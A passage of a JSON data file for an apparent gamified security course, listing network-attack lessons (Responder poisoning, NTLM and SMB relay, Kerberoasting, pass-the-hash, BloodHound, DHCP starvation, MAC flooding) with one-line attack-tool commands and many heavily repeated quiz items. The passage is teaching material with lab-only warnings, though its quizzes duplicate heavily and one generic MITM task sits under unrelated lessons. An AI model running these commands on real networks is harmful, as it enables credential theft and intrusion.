threshold","Encryption","Tunneling"],"ans":1},{"type":"quiz","q":"A MITM attack requires the attacker to be...","opts":["On a different network","Between the victim and the server","Physical at the server","Root on the victim"],"ans":1},{"type":"quiz","q":"What protocol does ping use?","opts":["TCP","UDP","ICMP","ARP"],"ans":2},{"type":"quiz","q":"What does tcpdump capture?","opts":["Keystrokes","Network packets","File changes","Process activity"],"ans":1},{"type":"quiz","q":"Wireshark's display filter for HTTP is...","opts":["filter http","http","tcp.http","protocol=http"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["The router","The switch's CAM table","The firewall","DNS server"],"ans":1},{"type":"quiz","q":"DHCP starvation exhausts...","opts":["CPU","Available IP addresses","Bandwidth","Disk space"],"ans":1},{"type":"quiz","q":"What protocol resolves IP to MAC?","opts":["DNS","DHCP","ARP","ICMP"],"ans":2},{"type":"quiz","q":"A rogue access point is...","opts":["A secured AP","A fake AP set up by an attacker","A government AP","An AP with no password"],"ans":1},{"type":"quiz","q":"Port 53 is used by...","opts":["HTTP","SSH","DNS","SMTP"],"ans":2},{"type":"quiz","q":"What protocol resolves IP to MAC?","opts":["DNS","DHCP","ARP","ICMP"],"ans":2},{"type":"quiz","q":"A rogue access point is...","opts":["A secured AP","A fake AP set up by an attacker","A government AP","An AP with no password"],"ans":1},{"type":"quiz","q":"Port 53 is used by...","opts":["HTTP","SSH","DNS","SMTP"],"ans":2},{"type":"quiz","q":"A TCP three-way handshake is...","opts":["SYN, ACK, FIN","SYN, SYN-ACK, ACK","ACK, SYN, RST","FIN, FIN-ACK, RST"],"ans":1},{"type":"quiz","q":"What layer do routers operate at?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":2},{"type":"quiz","q":"ARP operates at layer...","opts":["3","4","2","7"],"ans":2},{"type":"quiz","q":"MITM requires being...","opts":["On another network","Between victim and server","At the server","Root on victim"],"ans":1},{"type":"quiz","q":"Ping uses...","opts":["TCP","UDP","ICMP","ARP"],"ans":2},{"type":"quiz","q":"Port 443 is...","opts":["HTTP","HTTPS","SSH","FTP"],"ans":1},{"type":"quiz","q":"SYN flood targets...","opts":["Disk","Connection table","CPU","RAM"],"ans":1},{"type":"quiz","q":"VLAN isolates at layer...","opts":["1","2","3","7"],"ans":1},{"type":"quiz","q":"tcpdump captures...","opts":["Keystrokes","Network packets","File changes","Processes"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["Router","Switch CAM table","Firewall","DNS"],"ans":1},{"type":"quiz","q":"TCP handshake is...","opts":["SYN ACK FIN","SYN SYN-ACK ACK","ACK SYN RST","FIN FIN-ACK"],"ans":1},{"type":"quiz","q":"Routers operate at layer...","opts":["1","2","3","7"],"ans":2}]},{"id":"responder","cat":"Network Attacks","title":"Responder LLMNR/NBT-NS","diff":2,"xp":150,"intro":"Capture creds via poisoning.","sections":[{"type":"text","content":"Capture creds via poisoning."},{"type":"code","lang":"bash","content":"sudo responder -I eth0 -rdwv\nhashcat -m 5600 hash.txt rockyou.txt"},{"type":"text","content":"Network attacks exploit trust in old protocols. ARP has no authentication, DNS isn't verified, broadcasts answer anyone. Understanding WHY teaches more than memorizing tools."},{"type":"tip","content":"Always practice on a controlled lab network. Never run MITM or ARP spoofing on networks you don't own."},{"type":"task","content":"Build a 3-VM lab: attacker, target, gateway. Practice a MITM attack, capture cleartext credentials, then defend with ARP inspection."},{"type":"quiz","q":"Responder poisons?","opts":["DNS+DHCP","LLMNR + NBT-NS","HTTP+HTTPS","SMB+FTP"],"ans":1},{"type":"quiz","q":"Port 443 is typically used for...","opts":["HTTP","HTTPS","SSH","FTP"],"ans":1},{"type":"quiz","q":"A SYN flood targets which resource?","opts":["Disk space","Connection table (half-open connections)","CPU","RAM"],"ans":1},{"type":"quiz","q":"A VLAN isolates traffic at which layer?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":1},{"type":"quiz","q":"What does tcpdump capture?","opts":["Keystrokes","Network packets","File changes","Process activity"],"ans":1},{"type":"quiz","q":"Wireshark's display filter for HTTP is...","opts":["filter http","http","tcp.http","protocol=http"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["The router","The switch's CAM table","The firewall","DNS server"],"ans":1},{"type":"quiz","q":"DHCP starvation exhausts...","opts":["CPU","Available IP addresses","Bandwidth","Disk space"],"ans":1},{"type":"quiz","q":"What protocol resolves IP to MAC?","opts":["DNS","DHCP","ARP","ICMP"],"ans":2},{"type":"quiz","q":"A rogue access point is...","opts":["A secured AP","A fake AP set up by an attacker","A government AP","An AP with no password"],"ans":1},{"type":"quiz","q":"A VLAN isolates traffic at which layer?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":1},{"type":"quiz","q":"What does tcpdump capture?","opts":["Keystrokes","Network packets","File changes","Process activity"],"ans":1},{"type":"quiz","q":"Wireshark's display filter for HTTP is...","opts":["filter http","http","tcp.http","protocol=http"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["The router","The switch's CAM table","The firewall","DNS server"],"ans":1},{"type":"quiz","q":"DHCP starvation exhausts...","opts":["CPU","Available IP addresses","Bandwidth","Disk space"],"ans":1},{"type":"quiz","q":"ARP operates at layer...","opts":["3","4","2","7"],"ans":2},{"type":"quiz","q":"MITM requires being...","opts":["On another network","Between victim and server","At the server","Root on victim"],"ans":1},{"type":"quiz","q":"Ping uses...","opts":["TCP","UDP","ICMP","ARP"],"ans":2},{"type":"quiz","q":"Port 443 is...","opts":["HTTP","HTTPS","SSH","FTP"],"ans":1},{"type":"quiz","q":"SYN flood targets...","opts":["Disk","Connection table","CPU","RAM"],"ans":1},{"type":"quiz","q":"VLAN isolates at layer...","opts":["1","2","3","7"],"ans":1},{"type":"quiz","q":"tcpdump captures...","opts":["Keystrokes","Network packets","File changes","Processes"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["Router","Switch CAM table","Firewall","DNS"],"ans":1},{"type":"quiz","q":"TCP handshake is...","opts":["SYN ACK FIN","SYN SYN-ACK ACK","ACK SYN RST","FIN FIN-ACK"],"ans":1},{"type":"quiz","q":"Routers operate at layer...","opts":["1","2","3","7"],"ans":2}]},{"id":"ntlm-relay","cat":"Network Attacks","title":"NTLM Relay","diff":3,"xp":200,"intro":"Relay auth to other services.","sections":[{"type":"text","content":"Relay auth to other services."},{"type":"code","lang":"bash","content":"ntlmrelayx.py -t smb://target -smb2support"},{"type":"text","content":"Network attacks exploit trust in old protocols. ARP has no authentication, DNS isn't verified, broadcasts answer anyone. Understanding WHY teaches more than memorizing tools."},{"type":"tip","content":"Always practice on a controlled lab network. Never run MITM or ARP spoofing on networks you don't own."},{"type":"task","content":"Build a 3-VM lab: attacker, target, gateway. Practice a MITM attack, capture cleartext credentials, then defend with ARP inspection."},{"type":"quiz","q":"NTLM relay does?","opts":["Cracks it","Forwards auth to another service","Stores","Encrypts"],"ans":1},{"type":"quiz","q":"ARP operates at which OSI layer?","opts":["Layer 3","Layer 4","Layer 2","Layer 7"],"ans":2},{"type":"quiz","q":"A MITM attack requires the attacker to be...","opts":["On a different network","Between the victim and the server","Physical at the server","Root on the victim"],"ans":1},{"type":"quiz","q":"Port 53 is used by...","opts":["HTTP","SSH","DNS","SMTP"],"ans":2},{"type":"quiz","q":"A TCP three-way handshake is...","opts":["SYN, ACK, FIN","SYN, SYN-ACK, ACK","ACK, SYN, RST","FIN, FIN-ACK, RST"],"ans":1},{"type":"quiz","q":"What layer do routers operate at?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":2},{"type":"quiz","q":"netcat (nc) is often called...","opts":["The network knife","The TCP/IP Swiss Army knife","The packet sniffer","The port scanner"],"ans":1},{"type":"quiz","q":"Evil twin attack targets...","opts":["Bluetooth","Wi-Fi (fake AP with same SSID)","Ethernet","USB"],"ans":1},{"type":"quiz","q":"TTL in IP packets stands for...","opts":["Total Transfer Length","Time To Live","Transmission Type Label","Transport Tracking Log"],"ans":1},{"type":"quiz","q":"What does a firewall's default deny policy do?","opts":["Allows everything","Blocks everything not explicitly allowed","Logs everything","Encrypts everything"],"ans":1},{"type":"quiz","q":"What protocol resolves IP to MAC?","opts":["DNS","DHCP","ARP","ICMP"],"ans":2},{"type":"quiz","q":"A rogue access point is...","opts":["A secured AP","A fake AP set up by an attacker","A government AP","An AP with no password"],"ans":1},{"type":"quiz","q":"Port 53 is used by...","opts":["HTTP","SSH","DNS","SMTP"],"ans":2},{"type":"quiz","q":"A TCP three-way handshake is...","opts":["SYN, ACK, FIN","SYN, SYN-ACK, ACK","ACK, SYN, RST","FIN, FIN-ACK, RST"],"ans":1},{"type":"quiz","q":"What layer do routers operate at?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":2},{"type":"quiz","q":"ARP operates at layer...","opts":["3","4","2","7"],"ans":2},{"type":"quiz","q":"MITM requires being...","opts":["On another network","Between victim and server","At the server","Root on victim"],"ans":1},{"type":"quiz","q":"Ping uses...","opts":["TCP","UDP","ICMP","ARP"],"ans":2},{"type":"quiz","q":"Port 443 is...","opts":["HTTP","HTTPS","SSH","FTP"],"ans":1},{"type":"quiz","q":"SYN flood targets...","opts":["Disk","Connection table","CPU","RAM"],"ans":1},{"type":"quiz","q":"VLAN isolates at layer...","opts":["1","2","3","7"],"ans":1},{"type":"quiz","q":"tcpdump captures...","opts":["Keystrokes","Network packets","File changes","Processes"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["Router","Switch CAM table","Firewall","DNS"],"ans":1},{"type":"quiz","q":"TCP handshake is...","opts":["SYN ACK FIN","SYN SYN-ACK ACK","ACK SYN RST","FIN FIN-ACK"],"ans":1},{"type":"quiz","q":"Routers operate at layer...","opts":["1","2","3","7"],"ans":2}]},{"id":"kerberoast","cat":"Network Attacks","title":"Kerberoasting","diff":2,"xp":175,"intro":"Crack service account hashes.","sections":[{"type":"text","content":"Crack service account hashes."},{"type":"code","lang":"bash","content":"GetUserSPNs.py domain/user:pass -dc-ip DC -request\nhashcat -m 13100 hashes.txt rockyou.txt"},{"type":"text","content":"Network attacks exploit trust in old protocols. ARP has no authentication, DNS isn't verified, broadcasts answer anyone. Understanding WHY teaches more than memorizing tools."},{"type":"tip","content":"Always practice on a controlled lab network. Never run MITM or ARP spoofing on networks you don't own."},{"type":"task","content":"Build a 3-VM lab: attacker, target, gateway. Practice a MITM attack, capture cleartext credentials, then defend with ARP inspection."},{"type":"quiz","q":"Ticket type requested?","opts":["TGT","TGS (service ticket)","Referral","Session"],"ans":1},{"type":"quiz","q":"What protocol does ping use?","opts":["TCP","UDP","ICMP","ARP"],"ans":2},{"type":"quiz","q":"Port 443 is typically used for...","opts":["HTTP","HTTPS","SSH","FTP"],"ans":1},{"type":"quiz","q":"MITM stands for...","opts":["Machine In The Middle","Man In The Middle","Module Integration Test Mode","Managed Internet Traffic Monitor"],"ans":1},{"type":"quiz","q":"A VLAN isolates traffic at which layer?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":1},{"type":"quiz","q":"What does tcpdump capture?","opts":["Keystrokes","Network packets","File changes","Process activity"],"ans":1},{"type":"quiz","q":"Wireshark's display filter for HTTP is...","opts":["filter http","http","tcp.http","protocol=http"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["The router","The switch's CAM table","The firewall","DNS server"],"ans":1},{"type":"quiz","q":"DHCP starvation exhausts...","opts":["CPU","Available IP addresses","Bandwidth","Disk space"],"ans":1},{"type":"quiz","q":"What protocol resolves IP to MAC?","opts":["DNS","DHCP","ARP","ICMP"],"ans":2},{"type":"quiz","q":"A VLAN isolates traffic at which layer?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":1},{"type":"quiz","q":"What does tcpdump capture?","opts":["Keystrokes","Network packets","File changes","Process activity"],"ans":1},{"type":"quiz","q":"Wireshark's display filter for HTTP is...","opts":["filter http","http","tcp.http","protocol=http"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["The router","The switch's CAM table","The firewall","DNS server"],"ans":1},{"type":"quiz","q":"DHCP starvation exhausts...","opts":["CPU","Available IP addresses","Bandwidth","Disk space"],"ans":1},{"type":"quiz","q":"ARP operates at layer...","opts":["3","4","2","7"],"ans":2},{"type":"quiz","q":"MITM requires being...","opts":["On another network","Between victim and server","At the server","Root on victim"],"ans":1},{"type":"quiz","q":"Ping uses...","opts":["TCP","UDP","ICMP","ARP"],"ans":2},{"type":"quiz","q":"Port 443 is...","opts":["HTTP","HTTPS","SSH","FTP"],"ans":1},{"type":"quiz","q":"SYN flood targets...","opts":["Disk","Connection table","CPU","RAM"],"ans":1},{"type":"quiz","q":"VLAN isolates at layer...","opts":["1","2","3","7"],"ans":1},{"type":"quiz","q":"tcpdump captures...","opts":["Keystrokes","Network packets","File changes","Processes"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["Router","Switch CAM table","Firewall","DNS"],"ans":1},{"type":"quiz","q":"TCP handshake is...","opts":["SYN ACK FIN","SYN SYN-ACK ACK","ACK SYN RST","FIN FIN-ACK"],"ans":1},{"type":"quiz","q":"Routers operate at layer...","opts":["1","2","3","7"],"ans":2}]},{"id":"smb-relay","cat":"Network Attacks","title":"SMB Relay","diff":2,"xp":150,"intro":"Relay SMB auth for RCE.","sections":[{"type":"text","content":"Relay SMB auth for RCE."},{"type":"code","lang":"bash","content":"ntlmrelayx.py -t target -smb2support -e payload.exe"},{"type":"text","content":"Network attacks exploit trust in old protocols. ARP has no authentication, DNS isn't verified, broadcasts answer anyone. Understanding WHY teaches more than memorizing tools."},{"type":"tip","content":"Always practice on a controlled lab network. Never run MITM or ARP spoofing on networks you don't own."},{"type":"task","content":"Build a 3-VM lab: attacker, target, gateway. Practice a MITM attack, capture cleartext credentials, then defend with ARP inspection."},{"type":"quiz","q":"Must be disabled for relay?","opts":["Firewall","SMB signing","AV","UAC"],"ans":1},{"type":"quiz","q":"A SYN flood targets which resource?","opts":["Disk space","Connection table (half-open connections)","CPU","RAM"],"ans":1},{"type":"quiz","q":"ARP operates at which OSI layer?","opts":["Layer 3","Layer 4","Layer 2","Layer 7"],"ans":2},{"type":"quiz","q":"A rogue access point is...","opts":["A secured AP","A fake AP set up by an attacker","A government AP","An AP with no password"],"ans":1},{"type":"quiz","q":"Port 53 is used by...","opts":["HTTP","SSH","DNS","SMTP"],"ans":2},{"type":"quiz","q":"A TCP three-way handshake is...","opts":["SYN, ACK, FIN","SYN, SYN-ACK, ACK","ACK, SYN, RST","FIN, FIN-ACK, RST"],"ans":1},{"type":"quiz","q":"What layer do routers operate at?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":2},{"type":"quiz","q":"netcat (nc) is often called...","opts":["The network knife","The TCP/IP Swiss Army knife","The packet sniffer","The port scanner"],"ans":1},{"type":"quiz","q":"Evil twin attack targets...","opts":["Bluetooth","Wi-Fi (fake AP with same SSID)","Ethernet","USB"],"ans":1},{"type":"quiz","q":"TTL in IP packets stands for...","opts":["Total Transfer Length","Time To Live","Transmission Type Label","Transport Tracking Log"],"ans":1},{"type":"quiz","q":"What protocol resolves IP to MAC?","opts":["DNS","DHCP","ARP","ICMP"],"ans":2},{"type":"quiz","q":"A rogue access point is...","opts":["A secured AP","A fake AP set up by an attacker","A government AP","An AP with no password"],"ans":1},{"type":"quiz","q":"Port 53 is used by...","opts":["HTTP","SSH","DNS","SMTP"],"ans":2},{"type":"quiz","q":"A TCP three-way handshake is...","opts":["SYN, ACK, FIN","SYN, SYN-ACK, ACK","ACK, SYN, RST","FIN, FIN-ACK, RST"],"ans":1},{"type":"quiz","q":"What layer do routers operate at?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":2},{"type":"quiz","q":"ARP operates at layer...","opts":["3","4","2","7"],"ans":2},{"type":"quiz","q":"MITM requires being...","opts":["On another network","Between victim and server","At the server","Root on victim"],"ans":1},{"type":"quiz","q":"Ping uses...","opts":["TCP","UDP","ICMP","ARP"],"ans":2},{"type":"quiz","q":"Port 443 is...","opts":["HTTP","HTTPS","SSH","FTP"],"ans":1},{"type":"quiz","q":"SYN flood targets...","opts":["Disk","Connection table","CPU","RAM"],"ans":1},{"type":"quiz","q":"VLAN isolates at layer...","opts":["1","2","3","7"],"ans":1},{"type":"quiz","q":"tcpdump captures...","opts":["Keystrokes","Network packets","File changes","Processes"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["Router","Switch CAM table","Firewall","DNS"],"ans":1},{"type":"quiz","q":"TCP handshake is...","opts":["SYN ACK FIN","SYN SYN-ACK ACK","ACK SYN RST","FIN FIN-ACK"],"ans":1},{"type":"quiz","q":"Routers operate at layer...","opts":["1","2","3","7"],"ans":2}]},{"id":"dhcp-starve","cat":"Network Attacks","title":"DHCP Starvation","diff":1,"xp":100,"intro":"Exhaust DHCP pool.","sections":[{"type":"text","content":"Exhaust DHCP pool."},{"type":"code","lang":"bash","content":"yersinia dhcp -attack 1 -interface eth0"},{"type":"text","content":"Network attacks exploit trust in old protocols. ARP has no authentication, DNS isn't verified, broadcasts answer anyone. Understanding WHY teaches more than memorizing tools."},{"type":"tip","content":"Always practice on a controlled lab network. Never run MITM or ARP spoofing on networks you don't own."},{"type":"task","content":"Build a 3-VM lab: attacker, target, gateway. Practice a MITM attack, capture cleartext credentials, then defend with ARP inspection."},{"type":"quiz","q":"Exhausts what?","opts":["DNS","DHCP IP pool","Bandwidth","CPU"],"ans":1},{"type":"quiz","q":"A MITM attack requires the attacker to be...","opts":["On a different network","Between the victim and the server","Physical at the server","Root on the victim"],"ans":1},{"type":"quiz","q":"What protocol does ping use?","opts":["TCP","UDP","ICMP","ARP"],"ans":2},{"type":"quiz","q":"What does a firewall's default deny policy do?","opts":["Allows everything","Blocks everything not explicitly allowed","Logs everything","Encrypts everything"],"ans":1},{"type":"quiz","q":"MITM stands for...","opts":["Machine In The Middle","Man In The Middle","Module Integration Test Mode","Managed Internet Traffic Monitor"],"ans":1},{"type":"quiz","q":"A VLAN isolates traffic at which layer?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":1},{"type":"quiz","q":"What does tcpdump capture?","opts":["Keystrokes","Network packets","File changes","Process activity"],"ans":1},{"type":"quiz","q":"Wireshark's display filter for HTTP is...","opts":["filter http","http","tcp.http","protocol=http"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["The router","The switch's CAM table","The firewall","DNS server"],"ans":1},{"type":"quiz","q":"DHCP starvation exhausts...","opts":["CPU","Available IP addresses","Bandwidth","Disk space"],"ans":1},{"type":"quiz","q":"A VLAN isolates traffic at which layer?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":1},{"type":"quiz","q":"What does tcpdump capture?","opts":["Keystrokes","Network packets","File changes","Process activity"],"ans":1},{"type":"quiz","q":"Wireshark's display filter for HTTP is...","opts":["filter http","http","tcp.http","protocol=http"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["The router","The switch's CAM table","The firewall","DNS server"],"ans":1},{"type":"quiz","q":"DHCP starvation exhausts...","opts":["CPU","Available IP addresses","Bandwidth","Disk space"],"ans":1},{"type":"quiz","q":"ARP operates at layer...","opts":["3","4","2","7"],"ans":2},{"type":"quiz","q":"MITM requires being...","opts":["On another network","Between victim and server","At the server","Root on victim"],"ans":1},{"type":"quiz","q":"Ping uses...","opts":["TCP","UDP","ICMP","ARP"],"ans":2},{"type":"quiz","q":"Port 443 is...","opts":["HTTP","HTTPS","SSH","FTP"],"ans":1},{"type":"quiz","q":"SYN flood targets...","opts":["Disk","Connection table","CPU","RAM"],"ans":1},{"type":"quiz","q":"VLAN isolates at layer...","opts":["1","2","3","7"],"ans":1},{"type":"quiz","q":"tcpdump captures...","opts":["Keystrokes","Network packets","File changes","Processes"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["Router","Switch CAM table","Firewall","DNS"],"ans":1},{"type":"quiz","q":"TCP handshake is...","opts":["SYN ACK FIN","SYN SYN-ACK ACK","ACK SYN RST","FIN FIN-ACK"],"ans":1},{"type":"quiz","q":"Routers operate at layer...","opts":["1","2","3","7"],"ans":2}]},{"id":"pass-hash","cat":"Network Attacks","title":"Pass the Hash","diff":2,"xp":150,"intro":"Auth with NTLM hash.","sections":[{"type":"text","content":"Auth with NTLM hash."},{"type":"code","lang":"bash","content":"psexec.py -hashes :HASH admin@target\nevil-winrm -i target -u admin -H HASH"},{"type":"text","content":"Network attacks exploit trust in old protocols. ARP has no authentication, DNS isn't verified, broadcasts answer anyone. Understanding WHY teaches more than memorizing tools."},{"type":"tip","content":"Always practice on a controlled lab network. Never run MITM or ARP spoofing on networks you don't own."},{"type":"task","content":"Build a 3-VM lab: attacker, target, gateway. Practice a MITM attack, capture cleartext credentials, then defend with ARP inspection."},{"type":"quiz","q":"PtH auth protocol?","opts":["Kerberos","NTLM","OAuth","SAML"],"ans":1},{"type":"quiz","q":"Port 443 is typically used for...","opts":["HTTP","HTTPS","SSH","FTP"],"ans":1},{"type":"quiz","q":"A SYN flood targets which resource?","opts":["Disk space","Connection table (half-open connections)","CPU","RAM"],"ans":1},{"type":"quiz","q":"What protocol resolves IP to MAC?","opts":["DNS","DHCP","ARP","ICMP"],"ans":2},{"type":"quiz","q":"A rogue access point is...","opts":["A secured AP","A fake AP set up by an attacker","A government AP","An AP with no password"],"ans":1},{"type":"quiz","q":"Port 53 is used by...","opts":["HTTP","SSH","DNS","SMTP"],"ans":2},{"type":"quiz","q":"A TCP three-way handshake is...","opts":["SYN, ACK, FIN","SYN, SYN-ACK, ACK","ACK, SYN, RST","FIN, FIN-ACK, RST"],"ans":1},{"type":"quiz","q":"What layer do routers operate at?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":2},{"type":"quiz","q":"netcat (nc) is often called...","opts":["The network knife","The TCP/IP Swiss Army knife","The packet sniffer","The port scanner"],"ans":1},{"type":"quiz","q":"Evil twin attack targets...","opts":["Bluetooth","Wi-Fi (fake AP with same SSID)","Ethernet","USB"],"ans":1},{"type":"quiz","q":"What protocol resolves IP to MAC?","opts":["DNS","DHCP","ARP","ICMP"],"ans":2},{"type":"quiz","q":"A rogue access point is...","opts":["A secured AP","A fake AP set up by an attacker","A government AP","An AP with no password"],"ans":1},{"type":"quiz","q":"Port 53 is used by...","opts":["HTTP","SSH","DNS","SMTP"],"ans":2},{"type":"quiz","q":"A TCP three-way handshake is...","opts":["SYN, ACK, FIN","SYN, SYN-ACK, ACK","ACK, SYN, RST","FIN, FIN-ACK, RST"],"ans":1},{"type":"quiz","q":"What layer do routers operate at?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":2},{"type":"quiz","q":"ARP operates at layer...","opts":["3","4","2","7"],"ans":2},{"type":"quiz","q":"MITM requires being...","opts":["On another network","Between victim and server","At the server","Root on victim"],"ans":1},{"type":"quiz","q":"Ping uses...","opts":["TCP","UDP","ICMP","ARP"],"ans":2},{"type":"quiz","q":"Port 443 is...","opts":["HTTP","HTTPS","SSH","FTP"],"ans":1},{"type":"quiz","q":"SYN flood targets...","opts":["Disk","Connection table","CPU","RAM"],"ans":1},{"type":"quiz","q":"VLAN isolates at layer...","opts":["1","2","3","7"],"ans":1},{"type":"quiz","q":"tcpdump captures...","opts":["Keystrokes","Network packets","File changes","Processes"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["Router","Switch CAM table","Firewall","DNS"],"ans":1},{"type":"quiz","q":"TCP handshake is...","opts":["SYN ACK FIN","SYN SYN-ACK ACK","ACK SYN RST","FIN FIN-ACK"],"ans":1},{"type":"quiz","q":"Routers operate at layer...","opts":["1","2","3","7"],"ans":2}]},{"id":"bloodhound","cat":"Network Attacks","title":"BloodHound AD Mapping","diff":2,"xp":150,"intro":"Map AD attack paths.","sections":[{"type":"text","content":"Map AD attack paths."},{"type":"code","lang":"bash","content":"SharpHound.exe -c All\nbloodhound-python -d domain -u user -p pass -c All"},{"type":"text","content":"Network attacks exploit trust in old protocols. ARP has no authentication, DNS isn't verified, broadcasts answer anyone. Understanding WHY teaches more than memorizing tools."},{"type":"tip","content":"Always practice on a controlled lab network. Never run MITM or ARP spoofing on networks you don't own."},{"type":"task","content":"Build a 3-VM lab: attacker, target, gateway. Practice a MITM attack, capture cleartext credentials, then defend with ARP inspection."},{"type":"quiz","q":"BloodHound visualizes?","opts":["Topology","AD attack paths","Web vulns","Packets"],"ans":1},{"type":"quiz","q":"ARP operates at which OSI layer?","opts":["Layer 3","Layer 4","Layer 2","Layer 7"],"ans":2},{"type":"quiz","q":"A MITM attack requires the attacker to be...","opts":["On a different network","Between the victim and the server","Physical at the server","Root on the victim"],"ans":1},{"type":"quiz","q":"TTL in IP packets stands for...","opts":["Total Transfer Length","Time To Live","Transmission Type Label","Transport Tracking Log"],"ans":1},{"type":"quiz","q":"What does a firewall's default deny policy do?","opts":["Allows everything","Blocks everything not explicitly allowed","Logs everything","Encrypts everything"],"ans":1},{"type":"quiz","q":"MITM stands for...","opts":["Machine In The Middle","Man In The Middle","Module Integration Test Mode","Managed Internet Traffic Monitor"],"ans":1},{"type":"quiz","q":"A VLAN isolates traffic at which layer?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":1},{"type":"quiz","q":"What does tcpdump capture?","opts":["Keystrokes","Network packets","File changes","Process activity"],"ans":1},{"type":"quiz","q":"Wireshark's display filter for HTTP is...","opts":["filter http","http","tcp.http","protocol=http"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["The router","The switch's CAM table","The firewall","DNS server"],"ans":1},{"type":"quiz","q":"A VLAN isolates traffic at which layer?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":1},{"type":"quiz","q":"What does tcpdump capture?","opts":["Keystrokes","Network packets","File changes","Process activity"],"ans":1},{"type":"quiz","q":"Wireshark's display filter for HTTP is...","opts":["filter http","http","tcp.http","protocol=http"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["The router","The switch's CAM table","The firewall","DNS server"],"ans":1},{"type":"quiz","q":"DHCP starvation exhausts...","opts":["CPU","Available IP addresses","Bandwidth","Disk space"],"ans":1},{"type":"quiz","q":"ARP operates at layer...","opts":["3","4","2","7"],"ans":2},{"type":"quiz","q":"MITM requires being...","opts":["On another network","Between victim and server","At the server","Root on victim"],"ans":1},{"type":"quiz","q":"Ping uses...","opts":["TCP","UDP","ICMP","ARP"],"ans":2},{"type":"quiz","q":"Port 443 is...","opts":["HTTP","HTTPS","SSH","FTP"],"ans":1},{"type":"quiz","q":"SYN flood targets...","opts":["Disk","Connection table","CPU","RAM"],"ans":1},{"type":"quiz","q":"VLAN isolates at layer...","opts":["1","2","3","7"],"ans":1},{"type":"quiz","q":"tcpdump captures...","opts":["Keystrokes","Network packets","File changes","Processes"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["Router","Switch CAM table","Firewall","DNS"],"ans":1},{"type":"quiz","q":"TCP handshake is...","opts":["SYN ACK FIN","SYN SYN-ACK ACK","ACK SYN RST","FIN FIN-ACK"],"ans":1},{"type":"quiz","q":"Routers operate at layer...","opts":["1","2","3","7"],"ans":2}]},{"id":"mac-flood","cat":"Network Attacks","title":"MAC Flooding","diff":1,"xp":100,"intro":"Overflow switch tables.","sections":[{"type":"text","content":"Overflow switch tables."},{"type":"code","lang":"bash","content":"sudo macof -i eth0"},{"type":"text","content":"Network attacks exploit trust in old protocols. ARP has no authentication, DNS isn't verified, broadcasts answer anyone. Understanding WHY teaches more than memorizing tools."},{"type":"tip","content":"Always practice on a controlled lab network. Never run MITM or ARP spoofing on networks you don't own."},{"type":"task","content":"Build a 3-VM lab: attacker, target, gateway. Practice a MITM attack, capture cleartext credentials, then defend with ARP inspection."},{"type":"quiz","q":"MAC table overflow effect?","opts":["Reboot","Broadcasts all frames (hub mode)","Blocks traffic","Alerts"],"ans":1},{"type":"quiz","q":"What protocol does ping use?","opts":["TCP","UDP","ICMP","ARP"],"ans":2},{"type":"quiz","q":"Port 443 is typically used for...","opts":["HTTP","HTTPS","SSH","FTP"],"ans":1},{"type":"quiz","q":"DHCP starvation exhausts...","opts":["CPU","Available IP addresses","Bandwidth","Disk space"],"ans":1},{"type":"quiz","q":"What protocol resolves IP to MAC?","opts":["DNS","DHCP","ARP","ICMP"],"ans":2},{"type":"quiz","q":"A rogue access point is...","opts":["A secured AP","A fake AP set up by an attacker","A government AP","An AP with no password"],"ans":1},{"type":"quiz","q":"Port 53 is used by...","opts":["HTTP","SSH","DNS","SMTP"],"ans":2},{"type":"quiz","q":"A TCP three-way handshake is...","opts":["SYN, ACK, FIN","SYN, SYN-ACK, ACK","ACK, SYN, RST","FIN, FIN-ACK, RST"],"ans":1},{"type":"quiz","q":"What layer do routers operate at?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":2},{"type":"quiz","q":"netcat (nc) is often called...","opts":["The network knife","The TCP/IP Swiss Army knife","The packet sniffer","The port scanner"],"ans":1},{"type":"quiz","q":"What protocol resolves IP to MAC?","opts":["DNS","DHCP","ARP","ICMP"],"ans":2},{"type":"quiz","q":"A rogue access point is...","opts":["A secured AP","A fake AP set up by an attacker","A government AP","An AP with no password"],"ans":1},{"type":"quiz","q":"Port 53 is used by...","opts":["HTTP","SSH","DNS","SMTP"],"ans":2},{"type":"quiz","q":"A TCP three-way handshake is...","opts":["SYN, ACK, FIN","SYN, SYN-ACK, ACK","ACK, SYN, RST","FIN, FIN-ACK, RST"],"ans":1},{"type":"quiz","q":"What layer do routers operate at?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":2},{"type":"quiz","q":"ARP operates at layer...","opts":["3","4","2","7"],"ans":2},{"type":"quiz","q":"MITM requires being...","opts":["On another network","Between victim and server","At the server","Root on victim"],"ans":1},{"type":"quiz","q":"Ping 